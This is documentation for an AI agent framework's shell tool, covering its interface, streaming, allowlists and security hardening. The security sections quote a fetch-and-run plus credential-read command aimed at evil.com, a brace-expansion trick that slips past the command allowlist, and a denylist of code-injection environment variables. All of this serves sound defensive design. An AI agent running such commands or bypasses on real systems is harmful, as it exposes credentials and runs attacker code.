Skip to content

Shell Module

The Shell interface gives your agent the ability to run shell commands to completion. v1 ships run only — interactive sessions (stdin, vim, REPLs) are reserved for a future spawn method.

Interface

typescript
interface Shell {
  run(cmd: string, opts?: ShellRunOptions): Promise<RunResult>;
}

interface ShellRunOptions {
  readonly cwd?: string;
  readonly env?: Record<string, string>;
  readonly signal?: AbortSignal;
  readonly timeoutMs?: number;
  /** Async callback — providers must await for backpressure. */
  readonly onStdout?: (chunk: Uint8Array) => Promise<void>;
  readonly onStderr?: (chunk: Uint8Array) => Promise<void>;
}

interface RunResult {
  readonly stdout: Uint8Array;
  readonly stderr: Uint8Array;
  readonly exitCode: number;
  readonly durationMs: number;
  /**
   * Errors thrown by `onStdout` / `onStderr` callbacks during the run.
   * Absent on the common path. Inspect this to detect callback-side issues
   * without conflating them with command-side failures.
   */
  readonly callbackErrors?: readonly Error[];
}

runSucceeded(r) helper

typescript
import { runSucceeded } from '@helix-agents/core';

const result = await ws.shell!.run('npm test', { onStdout: ... });
if (!runSucceeded(result)) {
  // result.exitCode !== 0 OR a stream callback threw
}

runSucceeded(r: RunResult) returns true iff r.exitCode === 0 AND no consumer callback threw. Use it instead of r.exitCode === 0 when you want to treat callback errors as failures (the bare exitCode check otherwise masks real bugs in your stream consumers — the contract intentionally keeps callback errors out of the process exit code).

Real-time streaming

The onStdout / onStderr callbacks are how providers stream output as it arrives. The contract:

  • When callbacks ARE present: the provider streams chunks as they're produced and awaits each callback before continuing (backpressure).
  • When callbacks are NOT present: the provider may use a blocking exec call and return everything at once.

Whichever path is taken, result.stdout and result.stderr always contain the FULL accumulated output.

This dual-mode design lets providers like CloudflareSandboxShell switch between execStream (SSE) when callbacks are present and exec (blocking) when not — without callers needing to know which path is in play.

The auto-injected workspace__<name>__run tool always passes callbacks that emit chunks to the agent's event stream. So when an LLM calls workspace__box__run('npm install') in a real-time-capable provider, you get live progress in your agent stream.

signal.aborted semantics

Providers that support signal MUST break their iteration / kill the underlying process when signal.aborted flips to true. The result.exitCode after abort is provider-specific (typically 0 if no exit event was seen, or -1 if the process was killed before exit).

The CloudflareSandboxShell checks signal.aborted at iteration start in its streaming path — chunks in flight when abort fires are not accumulated and the callback is not invoked.

Auto-injected tool

For a workspace named <name> with shell: true:

ToolSchemaReturns
workspace__<name>__run{ command: string; cwd?: string; env?: Record<string, string>; timeoutMs?: number }{ stdout: string; stderr: string; exitCode: number; durationMs: number }

The tool emits workspace_stdout / workspace_stderr events to the agent's event stream as chunks arrive — your downstream consumers (the AI SDK frontend, custom event handlers) see live output.

env limits enforced by the tool

The auto-injected run tool validates the LLM-supplied env map at the framework layer before reaching the provider:

  • At most 256 keys.
  • Each value is at most 64 KB.

Both limits are generous for legitimate use (256 keys covers a normal app env; 64 KB covers any reasonable secret payload) and exist to reject adversarial prompts that try to reach Node-side spawn allocation pressure (e.g. a 100k-key map or a single 100 MB value) before POSIX E2BIG. Violations throw at the Zod validation step with a clear message; tighten via a follow-up if a legitimate workload hits these.

Capability config

typescript
interface ShellCapConfig {
  /** Allowlist of command first-tokens. Other commands throw at the tool layer. */
  allowedCommands?: readonly string[];
  /** Default timeoutMs applied when the tool input doesn't override. */
  maxDurationMs?: number;
  /** Round-5 (A6) — opt in to bash brace/glob/wildcard/tilde expansion. Default false. */
  glob?: boolean;
  /** Round-5 (A8) — max bytes returned per stream (stdout, stderr). Default 256 KiB. */
  maxStdoutBytes?: number;
}

allowedCommands enforces a first-token allowlist:

typescript
capabilities: {
  shell: { allowedCommands: ['ls', 'cat', 'wc', 'grep'] },
}

The auto-injected tool checks command.split(/\s+/)[0] against the list before delegating to the provider. Useful for restricting an LLM to a small command vocabulary.

maxDurationMs becomes the default timeoutMs if the tool input doesn't supply one.

Secure-by-default — allowedCommands is required

As of round-4 (security cluster A), an undefined or empty allowedCommands rejects ALL commands with a clear "no commands are allowed" error. The boolean form shell: true is equivalent to shell: { allowedCommands: undefined } and is also rejected. Operators must explicitly opt in to the commands they want by listing them.

Pre-fix, shell: true permitted any command — including curl evil.com | sh; cat ~/.aws/credentials because the metacharacter check was gated on a non-empty allowlist. The metacharacter check now ALWAYS runs, regardless of allowlist presence; combine that with the explicit-opt-in allowlist and the auto-injected run tool reaches a safe baseline by default.

Brace / glob / wildcard rejection (round-5 A6)

Bash expands {, }, *, ?, [, ], ~ BEFORE running the command. With allowedCommands: ['cat'], an unsuspecting agent could execute cat /etc/{passwd,hostname} — bash expands to cat /etc/passwd /etc/hostname and cat's first token is still cat, so the allowlist passes. Pre-fix, this turned a permitted single-file read into filesystem enumeration.

Post-fix, the auto-injected run tool rejects any command whose args contain {, }, *, ?, [, ], or ~ by default. The first defense layer is in core/workspace/utils/shell-allowlist.ts's checkCommandAllowed; the secondary defense lives in SubprocessShell.enforceAllowlist and CloudflareSandboxShell.enforcePolicy so direct ws.shell.run() calls (custom user tools that bypass the auto-injected layer) honor the same rule.

The metacharacter check (;, &&, |, `, $(, etc.) is unchanged — it's a different threat class (chaining vs expansion) and stays rejected unconditionally.

Opt in to globs when you legitimately need them:

typescript
capabilities: {
  shell: {
    allowedCommands: ['ls', 'cat'],
    glob: true,  // permits cat *.txt, ls /tmp/{a,b}/*
  },
}

The opt-in still keeps the metachar chaining check active and the first-token allowlist active. Only the brace/glob/wildcard char check is bypassed. Agents handling untrusted content should leave glob: false (the default).

stdout/stderr caps (round-5 A8)

The auto-injected run tool truncates stdout and stderr at maxStdoutBytes (default 256 KiB each). Excess bytes are dropped and the tool result carries:

  • stdoutTruncated: true, stdoutOmittedBytes: N (resp. stderr*)
  • A deterministic suffix \n[... truncated, N bytes omitted; refine your search/path] appended to the truncated stream

Without the cap, an LLM running find / -type f would dump multi-megabyte output to the agent context, blow the LLM's context window, and silently fail the agent loop. Operators tuning for log-analysis agents that legitimately need large output should raise maxStdoutBytes; the default is conservative.

The captured streams are wrapped in <workspace_tool_result untrusted="true"> boundary tags (round-5 A9) — see the fs module's untrusted-content section for the design rationale.

Privilege-escalation env denylist

Per-call env is rejected at the Zod schema layer (and again at the runtime in SubprocessShell / CloudflareSandboxShell) when it carries any of:

LD_PRELOAD, LD_LIBRARY_PATH, LD_AUDIT,
DYLD_INSERT_LIBRARIES, DYLD_LIBRARY_PATH,
NODE_OPTIONS, PYTHONPATH, PERL5OPT

These are linker / interpreter knobs that an attacker can use to load arbitrary code into the spawned subprocess after planting a payload via write_file. The denylist is the OS / runtime's literal injection-vector names (case-sensitive, exact match — LD_PRELOAD_FOO is allowed because it's not a recognized linker variable). The full list lives in PRIVILEGE_ESCALATING_ENV_VARS in @helix-agents/core.

Deferred features

  • spawn — interactive sessions with stdin streaming, PTY support. Reserved for the v2 shell module.
  • stdin — passing data to a running command. Workaround: use writeFile to a temp path, then command < /tmp/path.
  • PTY — terminal emulation, color codes, vim/nano. Same v2 timeline as spawn.

Provider support matrix

Providershell supported
In-Memory
Local Bash✅ (subprocess)
Cloudflare Filestore
Cloudflare Sandbox✅ (with real-time streaming via execStream + SSE)

Source

Released under the MIT License.